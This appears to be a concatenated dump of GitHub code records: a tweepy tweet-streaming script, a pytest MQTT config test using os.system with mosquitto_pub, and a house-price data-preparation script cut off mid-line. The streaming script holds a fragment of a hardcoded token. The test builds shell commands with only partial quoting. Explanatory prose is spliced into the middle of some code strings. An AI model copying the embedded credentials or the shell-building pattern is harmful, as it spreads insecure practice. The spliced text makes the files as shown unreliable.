'atAA8KaQFjRk4sPEOtCiIyWpouoiLANd2BLQNvA090o9D'\n\nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n\napi = tweepy.API(auth)\n\n\nclass MyListener(StreamListener):\n\n    def on_data(self, data):\n        try:\n            # temp = str(data)\n            js = json.loads(data)\n            print(js[\"text\"])\n            tempData = {\n                \"fulltext\": js[\"text\"],\n                \"time\": js[\"created_at\"],\n                \"image\": js[\"user\"][\"profile_image_url\"]\n            }\n            tempObj.append(tempData)\n            # with open('test.json', 'a') as f:\n            with open('test.json', 'w+') as f:\n                #f.write(json.dumps(tempdata))\n                # f.write(',')\n                f.write(json.dumps(tempObj))\n            return True\n\n        except BaseException as e:\n            print(\"Error on_data: %s\" % str(e))\n            return True\n\n    def on_error(self, status):\n        print(status)\n        return True\n\ndef parse_args():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"-kw\", \"--keywords\", type=str, default=\"RBC\", help=\"Key words string. 
\n    args = ap.parse_args()\n    return args\n\n# fo = open('test.json', 'w+')\nargs = parse_args()\nkeywords = args.keywords\nkeywords = keywords.replace('#',' ')\nprint('Search keywords: {}'.format(keywords))\n\ntempObj = []\nopen('test.json', 'w+')\ntwitter_stream = Stream(auth, MyListener())\n# twitter_stream.filter(track=['#123456789cuhacking'])\ntwitter_stream.filter(track=[keywords], languages=['en'])\n","repo_name":"monoKeith/cuAnalyse","sub_path":"web/RBC_tracking/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}{"seq_id":"24299852198","text":"import json\nimport os\nimport random\nimport string\nimport time\nimport typing\nimport pytest\nimport tenta\n\nPROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nMQTT_HOST = \"test.mosquitto.org\"\nMQTT_PORT = 1884\nMQTT_IDENTIFIER = \"rw\"\nMQTT_PASSWORD = \"readwrite\"\nSENSOR_IDENTIFIER = \"\".join(\n    random.choice(string.ascii_letters + string.digits) for i in range(32)\n)\n\n\ndef publish_config_object(topic: str, config_object: typing.Any) -> None:\n    config_object_string = (\n        config_object\n        if isinstance(config_object, str)\n        else json.dumps(config_object).replace('\"', r\"\\\"\")\n    )\n    command = (\n        f\"mosquitto_pub -h {MQTT_HOST} -p {MQTT_PORT} \"\n        + f\" -t {topic} \"\n        + f\"-u {MQTT_IDENTIFIER} -P {MQTT_PASSWORD} \"\n        + f'-m \"{config_object_string}\"'\n    )\n    print(f\"Executing command: {repr(command)}\")\n    assert os.system(command) == 0\n\n\n@pytest.mark.order(3)\ndef test_config_receiving() -> None:\n    tenta_client = tenta.TentaClient(\n        mqtt_host=MQTT_HOST,\n        mqtt_port=MQTT_PORT,\n        mqtt_identifier=MQTT_IDENTIFIER,\n        mqtt_password=MQTT_PASSWORD,\n        connection_timeout=1,\n        sensor_identifier=SENSOR_IDENTIFIER,\n        receive_configs=True,\n    )\n\n    config_1 = tenta.ConfigurationMessage(\n        revision=17,\n        configuration={\"some_value\": 42},\n    )\n    config_2 = tenta.ConfigurationMessage(\n        revision=18,\n        configuration={\"some_other_value\": 43},\n    )\n\n    # send invalid config -> ignored by client\n    publish_config_object(\n        topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n        config_object={\"nota\": \"config\"},\n    )\n    time.sleep(1)\n    received_config = tenta_client.get_latest_received_config_message()\n    assert received_config is None\n\n    # send another invalid config -> ignored by client\n    publish_config_object(\n        topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n        config_object=\"only a string\",\n    )\n    time.sleep(1)\n    received_config = tenta_client.get_latest_received_config_message()\n    assert received_config is None\n\n    # send valid config but invalid topic -> ignored by client\n    publish_config_object(\n        topic=f\"some-other-topic/{SENSOR_IDENTIFIER}\",\n        config_object=config_1.__dict__,\n    )\n    time.sleep(1)\n    received_config = tenta_client.get_latest_received_config_message()\n    assert received_config is None\n\n    # send valid config -> accepted by client\n    publish_config_object(\n        topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n        config_object=config_1.__dict__,\n    )\n    time.sleep(1)\n    received_config = tenta_client.get_latest_received_config_message()\n    assert received_config is not None\n    assert received_config.revision == config_1.revision\n\n    # send invalid config -> ignored by client\n    publish_config_object(\n        topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n        config_object={\"nota\": \"config\"},\n    )\n    time.sleep(1)\n    received_config = tenta_client.get_latest_received_config_message()\n    assert received_config is not None\n    assert received_config.revision == config_1.revision
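`publish_config_object` escapes only double quotes before splicing the payload into a shell string, so characters like `'` or `$` in a configuration could still break the command. A more robust sketch using only the standard library (same mosquitto_pub flags as the test above; the values are illustrative):

```python
import json
import shlex

def build_pub_command(host, port, topic, user, password, config_object):
    payload = config_object if isinstance(config_object, str) else json.dumps(config_object)
    # shlex.quote wraps topic and payload so the shell passes them through verbatim.
    return (
        f"mosquitto_pub -h {host} -p {port} -t {shlex.quote(topic)} "
        f"-u {user} -P {password} -m {shlex.quote(payload)}"
    )

print(build_pub_command("test.mosquitto.org", 1884, "configurations/abc", "rw", "readwrite", {"revision": 1}))
```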
\n\n    # send valid config -> accepted by client\n    publish_config_object(\n        topic=f\"configurations/{SENSOR_IDENTIFIER}\",\n        config_object=config_2.__dict__,\n    )\n    time.sleep(1)\n    received_config = tenta_client.get_latest_received_config_message()\n    assert received_config is not None\n    assert received_config.revision == config_2.revision\n\n    tenta_client.teardown()\n","repo_name":"tum-esm/tenta-client","sub_path":"tests/test_config_receiving.py","file_name":"test_config_receiving.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}{"seq_id":"9463722096","text":"import warnings\n\nimport numpy as np\nimport pandas as pd\nimport joblib\nimport argparse\n\nimport matplotlib.pyplot as plt\nfrom catboost import CatBoostRegressor\nfrom lightgbm import LGBMRegressor\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.tree import DecisionTreeRegressor\nfrom xgboost import XGBRegressor\nfrom sklearn.model_selection import RandomizedSearchCV\n\nfrom scipy import stats\nfrom scipy.stats import skew, boxcox_normmax, norm\nfrom scipy.special import boxcox1p\n\nimport time\nfrom contextlib import contextmanager\n\nfrom helpers.data_prep import *\nfrom helpers.eda import *\n\nwarnings.simplefilter(action='ignore')\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\nfrom warnings import filterwarnings\nfilterwarnings('ignore')\n\n\n# decorators: functions that wrap and extend other functions.\n@contextmanager\n# reports the elapsed time of the wrapped block\ndef timer(title):\n    t0 = time.time()\n    yield\n    print(\"{} - done in {:.0f}s\".format(title, time.time() - t0))\n    print(\" \")\n\n\ndef get_namespace():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('--nobase', dest='base', action='store_false')\n    parser.set_defaults(base=True)\n\n    parser.add_argument('--dump', dest='dump', action='store_true')\n    parser.set_defaults(dump=False)\n\n    parser.add_argument('--scoring', dest=\"scoring\", action=\"store\", type=str)\n    parser.set_defaults(scoring=\"neg_mean_squared_error\")\n\n    return parser.parse_args()\n\n\n######################################################\n# Data Preprocessing & Feature Engineering\n######################################################\ndef grab_col_names(dataframe, cat_th=10, car_th=20):\n    \"\"\"\n\n    Returns the names of the categorical, numerical, and categorical-but-cardinal variables in the dataset.\n    Note: Numeric-looking categorical variables are also included among the categorical variables.\n\n    Parameters\n    ------\n        dataframe: dataframe\n                The dataframe whose variable names are to be retrieved\n        cat_th: int, optional\n                class threshold for variables that are numeric but categorical\n        car_th: int, optional\n                class threshold for variables that are categorical but cardinal\n\n    Returns\n    ------\n        cat_cols: list\n                List of categorical variables\n        num_cols: list\n                List of numerical variables\n        cat_but_car: list\n                List of cardinal variables that look categorical\n\n    Examples\n    ------\n        import seaborn as sns\n        df = sns.load_dataset(\"iris\")\n        print(grab_col_names(df))\n\n\n    Notes\n    ------\n        cat_cols + num_cols + cat_but_car = total number of variables\n        num_but_cat is contained in cat_cols.\n        The sum of the 3 returned lists equals the total number of variables: cat_cols + num_cols + cat_but_car = number of variables\n\n    \"\"\"\n\n    # cat_cols, cat_but_car\n    cat_cols = [col for col in dataframe.columns if dataframe[col].dtypes == \"O\"]\n    num_but_cat = [col for col in dataframe.columns if dataframe[col].nunique() < cat_th and\n                   dataframe[col].dtypes != \"O\"]\n    cat_but_car = [col for col in dataframe.columns if dataframe[col].nunique() > car_th and\n                   dataframe[col].dtypes == \"O\"]\n    cat_cols = cat_cols + num_but_cat\n    cat_cols = [col for col in cat_cols if col not in cat_but_car]\n\n    # num_cols\n    num_cols = [col for col in dataframe.columns if dataframe[col].dtypes != \"O\"]\n    num_cols = [col for col in num_cols if col not in num_but_cat]\n\n    # print(f\"Observations: {dataframe.shape[0]}\")\n    # print(f\"Variables: {dataframe.shape[1]}\")\n    # print(f'cat_cols: {len(cat_cols)}')\n    # print(f'num_cols: {len(num_cols)}')\n    # print(f'cat_but_car: {len(cat_but_car)}')\n    # print(f'num_but_cat: {len(num_but_cat)}')\n    return cat_cols, num_cols, cat_but_car\n\n\ndef one_hot_encoder(dataframe, categorical_cols, drop_first=False):\n    dataframe = pd.get_dummies(dataframe, columns=categorical_cols, drop_first=drop_first)\n    return dataframe\n\n\ndef check_df(dataframe, head=5):\n    print(\"##################### Shape #####################\")\n    print(dataframe.shape)\n    print(\"##################### Types #####################\")\n    print(dataframe.dtypes)\n    print(\"##################### Head #####################\")\n    print(dataframe.head(head))\n    print(\"##################### Tail #####################\")\n    print(dataframe.tail(head))\n    print(\"##################### NA #####################\")\n    print(dataframe.isnull().sum())\n    print(\"##################### Quantiles #####################\")\n    print(dataframe.quantile([0, 0.05, 0.50, 0.95, 0.99, 1]).T)\n\n\ndef find_correlation(dataframe, numeric_cols, corr_limit=0.50):\n    high_correlations = []\n    low_correlations = []\n    for col in numeric_cols:\n        if col == \"SalePrice\":\n            pass\n        else:\n            correlation = dataframe[[col, \"SalePrice\"]].corr().loc[col, \"SalePrice\"]\n            print(col, correlation)\n            if abs(correlation) > corr_limit:\n                high_correlations.append(col + \": \" + str(correlation))\n            else:\n                low_correlations.append(col + \": \" + str(correlation))\n    return low_correlations, high_correlations\n\n\ndef high_correlated_cols(dataframe, plot=False, corr_th=0.90):\n    corr = dataframe.corr()\n    cor_matrix = corr.abs()\n    upper_triangle_matrix = cor_matrix.where(np.triu(np.ones(cor_matrix.shape), k=1).astype(bool))\n    drop_list = [col for col in upper_triangle_matrix.columns if any(upper_triangle_matrix[col] > corr_th)]\n    if plot:\n        import seaborn as sns\n        import matplotlib.pyplot as plt\n        sns.set(rc={'figure.figsize': (15, 15)})\n        sns.heatmap(corr, cmap=\"RdBu\")\n        plt.show()\n    return drop_list\n\n\ndef outliers(dataframe, num_cols):\n    outlier_indices = []\n    for feature in num_cols:\n        print('VARIABLE: {}'.format(feature))\n        q1 = np.percentile(dataframe[feature], 5)\n        q3 = np.percentile(dataframe[feature], 95)\n        iqr = q3 - q1\n        outlier_step = iqr * 1.5\n        upper = q3 + outlier_step\n        lower = q1 - outlier_step\n        outlier_list_col = dataframe[(dataframe[feature] < lower) | (dataframe[feature] > upper)].index\n        print('NUMBER OF OUTLIERS: {}'.format(outlier_list_col.shape[0]), '\\n')\n        for a in outlier_list_col:\n            outlier_indices.append(a)\n    return outlier_indices
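A quick illustration of `grab_col_names` on a hypothetical toy frame (the thresholds are the function's defaults; the expected output was traced by hand and is not part of the original script):

```python
import pandas as pd

toy = pd.DataFrame({
    "neighborhood": ["A", "B", "A", "C"],   # object dtype -> categorical
    "rooms": [3, 4, 3, 5],                  # few unique ints -> numeric but categorical
    "price": [100.0, 150.0, 120.0, 200.0],  # truly numerical
})
print(grab_col_names(toy))
# -> (['neighborhood', 'rooms'], ['price'], [])
```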
\n\n\ndef house_price_prep(dataframe):\n    print(\"Data Preprocessing...\")\n    check_df(dataframe)\n\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n    outliers(dataframe, num_cols)\n    # The dataset's author recommends dropping 'houses with more than 4000 square feet' from the data.\n    dataframe = dataframe.drop(dataframe[(dataframe['GrLivArea'] > 4000) & (dataframe['SalePrice'] < 300000)].index)\n\n    # MISSING VALUES\n    missing_vs_target(dataframe, \"SalePrice\", missing_values_table(dataframe, na_name=True))\n    missing_values_table(dataframe)\n\n    dataframe[\"Alley\"] = dataframe[\"Alley\"].fillna(\"None\")\n    dataframe[\"PoolQC\"] = dataframe[\"PoolQC\"].fillna(\"None\")\n    dataframe[\"MiscFeature\"] = dataframe[\"MiscFeature\"].fillna(\"None\")\n    dataframe[\"Fence\"] = dataframe[\"Fence\"].fillna(\"None\")\n    dataframe[\"FireplaceQu\"] = dataframe[\"FireplaceQu\"].fillna(\"None\")\n    dataframe[\"LotFrontage\"] = dataframe.groupby(\"Neighborhood\")[\"LotFrontage\"].transform(lambda x: x.fillna(x.median()))\n\n    for col in ('GarageType', 'GarageFinish', 'GarageQual', 'GarageCond'):\n        dataframe[col] = dataframe[col].fillna('None')\n\n    dataframe.drop(['GarageArea'], axis=1, inplace=True)\n    dataframe.drop(['GarageYrBlt'], axis=1, inplace=True)\n    dataframe.drop(['Utilities'], axis=1, inplace=True)\n\n    dataframe[\"GarageCars\"] = dataframe[\"GarageCars\"].fillna(0)\n\n    for col in ('BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF', 'TotalBsmtSF', 'BsmtFullBath', 'BsmtHalfBath'):\n        dataframe[col] = dataframe[col].fillna(0)\n\n    for col in ('BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2'):\n        dataframe[col] = dataframe[col].fillna('None')\n\n    dataframe['MSZoning'] = dataframe.groupby('MSSubClass')['MSZoning'].apply(lambda x: x.fillna(x.mode()[0]))\n    dataframe[\"MasVnrType\"] = dataframe[\"MasVnrType\"].fillna(\"None\")\n    dataframe[\"MasVnrArea\"] = dataframe[\"MasVnrArea\"].fillna(0)\n\n    dataframe[\"Functional\"] = dataframe[\"Functional\"].fillna(\"Typ\")\n    dataframe['Electrical'] = dataframe['Electrical'].fillna(dataframe['Electrical'].mode()[0])\n    dataframe['KitchenQual'] = dataframe['KitchenQual'].fillna(dataframe['KitchenQual'].mode()[0])\n    dataframe['Exterior1st'] = dataframe['Exterior1st'].fillna(dataframe['Exterior1st'].mode()[0])\n    dataframe['Exterior2nd'] = dataframe['Exterior2nd'].fillna(dataframe['Exterior2nd'].mode()[0])\n    dataframe['SaleType'] = dataframe['SaleType'].fillna(dataframe['SaleType'].mode()[0])\n\n    dataframe['YrSold'] = dataframe['YrSold'].astype(str)\n\n    # FEATURE ENGINEERING\n    # For Categorical Variables\n    # First, group some categorical variables by the effect of their classes on the target variable.\n\n    dataframe.groupby(\"Neighborhood\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)  # The neighborhood with the largest effect on price is NoRidge, while the one with the smallest is MeadowV. We build an ordinal grouping from these mean values.\n\n    nhood_map = {'MeadowV': 1, 'IDOTRR': 1, 'BrDale': 1,\n                 'BrkSide': 2, 'Edwards': 2, 'OldTown': 2,\n                 'Sawyer': 3, 'Blueste': 3,\n                 'SWISU': 4, 'NPkVill': 4, 'NAmes': 4, 'Mitchel': 4,\n                 'SawyerW': 5, 'NWAmes': 5,\n                 'Gilbert': 6, 'Blmngtn': 6, 'CollgCr': 6,\n                 'Crawfor': 7, 'ClearCr': 7,\n                 'Somerst': 8, 'Veenker': 8, 'Timber': 8,\n                 'StoneBr': 9, 'NridgHt': 9,\n                 'NoRidge': 10}\n\n    dataframe['Neighborhood'] = dataframe['Neighborhood'].map(nhood_map).astype('int')\n\n    dataframe = dataframe.replace({\"MSSubClass\": {20: \"SC20\", 30: \"SC30\", 40: \"SC40\", 45: \"SC45\", \\\n                                                  50: \"SC50\", 60: \"SC60\", 70: \"SC70\", 75: \"SC75\", \\\n                                                  80: \"SC80\", 85: \"SC85\", 90: \"SC90\", 120: \"SC120\", \\\n                                                  150: \"SC150\", 160: \"SC160\", 180: \"SC180\", 190: \"SC190\"},\n                                   \"MoSold\": {1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", \\\n                                              7: \"Jul\", 8: \"Aug\", 9: \"Sep\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"}\n                                   })\n\n    func = {\"Sal\": 0, \"Sev\": 1, \"Maj2\": 2, \"Maj1\": 3, \"Mod\": 4, \"Min2\": 5, \"Min1\": 6, \"Typ\": 7}\n    dataframe[\"Functional\"] = dataframe[\"Functional\"].map(func).astype(\"int\")\n    dataframe.groupby(\"Functional\").agg({\"SalePrice\": \"mean\"})\n    # Convert variables whose classes express a degree into an ordinal structure.\n    # MSZoning\n    dataframe.loc[(dataframe[\"MSZoning\"] == \"C (all)\"), \"MSZoning\"] = 1\n    dataframe.loc[(dataframe[\"MSZoning\"] == \"RM\"), \"MSZoning\"] = 2\n    dataframe.loc[(dataframe[\"MSZoning\"] == \"RH\"), \"MSZoning\"] = 2\n    dataframe.loc[(dataframe[\"MSZoning\"] == \"RL\"), \"MSZoning\"] = 3\n    dataframe.loc[(dataframe[\"MSZoning\"] == \"FV\"), \"MSZoning\"] = 3\n    # LotShape\n    dataframe.groupby(\"LotShape\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n    shape_map = {\"Reg\": 1, \"IR1\": 2, \"IR3\": 3, \"IR2\": 4}\n    dataframe['LotShape'] = dataframe['LotShape'].map(shape_map).astype('int')\n    # LandContour\n    dataframe.groupby(\"LandContour\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n    contour_map = {\"Bnk\": 1, \"Lvl\": 2, \"Low\": 3, \"HLS\": 4}\n    dataframe['LandContour'] = dataframe['LandContour'].map(contour_map).astype('int')\n\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n    # LotConfig\n    dataframe.loc[(dataframe[\"LotConfig\"] == \"Inside\"), \"LotConfig\"] = 1\n    dataframe.loc[(dataframe[\"LotConfig\"] == \"FR2\"), \"LotConfig\"] = 1\n    dataframe.loc[(dataframe[\"LotConfig\"] == \"Corner\"), \"LotConfig\"] = 1\n    dataframe.loc[(dataframe[\"LotConfig\"] == \"FR3\"), \"LotConfig\"] = 2\n    dataframe.loc[(dataframe[\"LotConfig\"] == \"CulDSac\"), \"LotConfig\"] = 2\n\n    # Condition1\n    cond1_map = {\"Artery\": 1, \"RRAe\": 1, \"Feedr\": 1,\n                 \"Norm\": 2, \"RRAn\": 2, \"RRNe\": 2,\n                 \"PosN\": 3, \"RRNn\": 3, \"PosA\": 3}\n    dataframe['Condition1'] = dataframe['Condition1'].map(cond1_map).astype('int')\n    #dataframe['Condition1'].isnull().sum()\n\n    # BldgType\n    dataframe.loc[(dataframe[\"BldgType\"] == \"2fmCon\"), \"BldgType\"] = 1\n    dataframe.loc[(dataframe[\"BldgType\"] == \"Duplex\"), \"BldgType\"] = 1\n    dataframe.loc[(dataframe[\"BldgType\"] == \"Twnhs\"), \"BldgType\"] = 1\n    dataframe.loc[(dataframe[\"BldgType\"] == \"1Fam\"), \"BldgType\"] = 2\n    dataframe.loc[(dataframe[\"BldgType\"] == \"TwnhsE\"), \"BldgType\"] = 2\n\n    # RoofStyle\n    dataframe.groupby(\"RoofStyle\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)
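The blocks of chained `.loc` assignments in this function (RoofStyle just below, LotConfig and BldgType above) each implement one ordinal lookup table, and the same encoding can be written as a single dictionary `map`. A sketch on a hypothetical toy column mirroring the RoofStyle values (illustrative only, not a change to the pipeline):

```python
import pandas as pd

s = pd.Series(["Gable", "Hip", "Flat", "Gable"])
roof_map = {"Gambrel": 1, "Gable": 2, "Mansard": 3, "Flat": 4, "Hip": 5, "Shed": 6}
print(s.map(roof_map).astype("int").tolist())  # [2, 5, 4, 2]
```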
\n    dataframe.loc[(dataframe[\"RoofStyle\"] == \"Gambrel\"), \"RoofStyle\"] = 1\n    dataframe.loc[(dataframe[\"RoofStyle\"] == \"Gable\"), \"RoofStyle\"] = 2\n    dataframe.loc[(dataframe[\"RoofStyle\"] == \"Mansard\"), \"RoofStyle\"] = 3\n    dataframe.loc[(dataframe[\"RoofStyle\"] == \"Flat\"), \"RoofStyle\"] = 4\n    dataframe.loc[(dataframe[\"RoofStyle\"] == \"Hip\"), \"RoofStyle\"] = 5\n    dataframe.loc[(dataframe[\"RoofStyle\"] == \"Shed\"), \"RoofStyle\"] = 6\n\n    # RoofMatl\n    dataframe.groupby(\"RoofMatl\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"Roll\"), \"RoofMatl\"] = 1\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"ClyTile\"), \"RoofMatl\"] = 2\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"CompShg\"), \"RoofMatl\"] = 3\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"Metal\"), \"RoofMatl\"] = 3\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"Tar&Grv\"), \"RoofMatl\"] = 3\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"WdShake\"), \"RoofMatl\"] = 4\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"Membran\"), \"RoofMatl\"] = 4\n    dataframe.loc[(dataframe[\"RoofMatl\"] == \"WdShngl\"), \"RoofMatl\"] = 5\n\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n    # ExterQual\n    dataframe.groupby(\"ExterQual\").agg({\"SalePrice\": \"mean\"}).sort_values(by=\"SalePrice\", ascending=False)\n    ext_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['ExterQual'] = dataframe['ExterQual'].map(ext_map).astype('int')\n\n    # ExterCond\n    ext_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['ExterCond'] = dataframe['ExterCond'].map(ext_map).astype('int')\n\n    # BsmtQual\n    bsm_map = {'None': 0, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['BsmtQual'] = dataframe['BsmtQual'].map(bsm_map).astype('int')\n\n    # BsmtCond\n    bsm_map = {'None': 0, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['BsmtCond'] = dataframe['BsmtCond'].map(bsm_map).astype('int')\n\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n    # BsmtFinType1\n    bsm_map = {'None': 0, 'Rec': 1, 'BLQ': 1, 'LwQ': 2, 'ALQ': 3, 'Unf': 3, 'GLQ': 4}\n    dataframe['BsmtFinType1'] = dataframe['BsmtFinType1'].map(bsm_map).astype('int')\n\n    # BsmtFinType2\n    bsm_map = {'None': 0, 'BLQ': 1, 'Rec': 2, 'LwQ': 2, 'Unf': 3, 'GLQ': 3, 'ALQ': 4}\n    dataframe['BsmtFinType2'] = dataframe['BsmtFinType2'].map(bsm_map).astype('int')\n\n    # BsmtExposure\n    bsm_map = {'None': 0, 'No': 1, 'Mn': 2, 'Av': 3, 'Gd': 4}\n    dataframe['BsmtExposure'] = dataframe['BsmtExposure'].map(bsm_map).astype('int')\n\n    # Heating\n    heat_map = {'Floor': 1, 'Grav': 1, 'Wall': 2, 'OthW': 3, 'GasW': 4, 'GasA': 5}\n    dataframe['Heating'] = dataframe['Heating'].map(heat_map).astype('int')\n\n    # HeatingQC\n    heat_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['HeatingQC'] = dataframe['HeatingQC'].map(heat_map).astype('int')\n\n    # KitchenQual\n    kitch_map = {'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['KitchenQual'] = dataframe['KitchenQual'].map(kitch_map).astype('int')\n\n    # FireplaceQu\n    fire_map = {'None': 0, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['FireplaceQu'] = dataframe['FireplaceQu'].map(fire_map).astype('int')\n\n    # GarageCond\n    garage_map = {'None': 1, 'Po': 1, 'Fa': 2, 'TA': 3, 'Gd': 4, 'Ex': 5}\n    dataframe['GarageCond'] = dataframe['GarageCond'].map(garage_map).astype('int')
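The sections above keep rebinding the same names (`ext_map`, `bsm_map`, `heat_map`) to different dictionaries, which is how a column can silently get encoded with a neighbouring column's scale. A small hypothetical helper (sketch only, not part of the original file) keeps each mapping tied to its column at the call site:

```python
def encode_ordinal(dataframe, column, mapping):
    # Map string categories to ordered integers for a single column.
    dataframe[column] = dataframe[column].map(mapping).astype("int")
    return dataframe

quality_scale = {"Po": 1, "Fa": 2, "TA": 3, "Gd": 4, "Ex": 5}
# e.g. encode_ordinal(df, "KitchenQual", quality_scale)
```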
\n    #dataframe['GarageCond'].value_counts()\n\n    # GarageQual\n    garage_map = {'None': 1, 'Po': 1, 'Fa': 2, 'TA': 3, 'Ex': 4, 'Gd': 5}\n    dataframe['GarageQual'] = dataframe['GarageQual'].map(garage_map).astype('int')\n\n    # PavedDrive\n    paved_map = {'N': 1, 'P': 2, 'Y': 3}\n    dataframe['PavedDrive'] = dataframe['PavedDrive'].map(paved_map).astype('int')\n\n    # CentralAir: central air conditioning\n    cent = {\"N\": 0, \"Y\": 1}\n    dataframe[\"CentralAir\"] = dataframe[\"CentralAir\"].map(cent).astype(\"int\")\n    dataframe.groupby(\"CentralAir\").agg({\"SalePrice\": \"mean\"})\n\n    # LandSlope\n    dataframe.loc[dataframe[\"LandSlope\"] == \"Gtl\", \"LandSlope\"] = 1\n    dataframe.loc[dataframe[\"LandSlope\"] == \"Sev\", \"LandSlope\"] = 2\n    dataframe.loc[dataframe[\"LandSlope\"] == \"Mod\", \"LandSlope\"] = 2\n    dataframe[\"LandSlope\"] = dataframe[\"LandSlope\"].astype(\"int\")\n\n    # OverallQual\n    dataframe.loc[dataframe[\"OverallQual\"] == 1, \"OverallQual\"] = 1\n    dataframe.loc[dataframe[\"OverallQual\"] == 2, \"OverallQual\"] = 1\n    dataframe.loc[dataframe[\"OverallQual\"] == 3, \"OverallQual\"] = 1\n    dataframe.loc[dataframe[\"OverallQual\"] == 4, \"OverallQual\"] = 2\n    dataframe.loc[dataframe[\"OverallQual\"] == 5, \"OverallQual\"] = 3\n    dataframe.loc[dataframe[\"OverallQual\"] == 6, \"OverallQual\"] = 4\n    dataframe.loc[dataframe[\"OverallQual\"] == 7, \"OverallQual\"] = 5\n    dataframe.loc[dataframe[\"OverallQual\"] == 8, \"OverallQual\"] = 6\n    dataframe.loc[dataframe[\"OverallQual\"] == 9, \"OverallQual\"] = 7\n    dataframe.loc[dataframe[\"OverallQual\"] == 10, \"OverallQual\"] = 8\n\n    cat_cols, num_cols, cat_but_car = grab_col_names(dataframe)\n    rare_analyser(dataframe, \"SalePrice\", cat_cols)\n\n    #################################################\n\n    # FEATURE ENGINEERING FOR OTHER FEATURES\n    # Overall condition of the house\n    dataframe[\"OverallGrade\"] = dataframe[\"OverallQual\"] * dataframe[\"OverallCond\"]\n    # garage quality combined with garage condition\n    dataframe[\"GarageGrade\"] = dataframe[\"GarageQual\"] * dataframe[\"GarageCond\"]\n    # for fireplace quality\n    dataframe[\"FireplaceScore\"] = dataframe[\"Fireplaces\"] * dataframe[\"FireplaceQu\"]\n    # Total SF for the house (including basement)\n    dataframe[\"AllSF\"] = dataframe[\"GrLivArea\"] + dataframe[\"TotalBsmtSF\"]\n    # Total SF for the 1st + 2nd floors\n    dataframe[\"AllFlrsSF\"] = dataframe[\"1stFlrSF\"] + dataframe[\"2ndFlrSF\"]\n\n    dataframe['TotalSF'] = (dataframe['BsmtFinSF1'] +\n                            dataframe['BsmtFinSF2'] +\n                            dataframe['1stFlrSF'] +\n                            dataframe['2ndFlrSF'])\n    # total bathrooms\n    dataframe['TotalBathrooms'] = (dataframe['FullBath'] +\n                                   (0.5 * dataframe['HalfBath']) +\n                                   dataframe['BsmtFullBath'] +\n                                   (0.5 * dataframe['BsmtHalfBath']))\n\n    # total porch areas\n    dataframe['TotalPorchSF'] = (dataframe['OpenPorchSF'] +\n                                 dataframe['3SsnPorch'] +\n                                 dataframe['EnclosedPorch'] +\n                                 dataframe['ScreenPorch'])\n\n    # Sum the quality scores within each category:\n    # combine the current condition and quality of the exterior material into an overall exterior quality.\n    dataframe['TotalExtQual'] = (dataframe['ExterQual'] +\n                                 dataframe['ExterCond'])\n\n    # For basement quality\n    dataframe['TotalBsmQual'] = (dataframe['BsmtQual'] +\n                                 dataframe['BsmtCond'] +\n                                 dataframe['BsmtFinType1'] +\n                                 dataframe['BsmtFinType2'])\n\n    # Sum all the quality scores:\n    dataframe['TotalQual'] = dataframe['OverallQual'] + \\\n                             dataframe['TotalExtQual'] + \\\n                             dataframe['TotalBsmQual'] + \\\n                    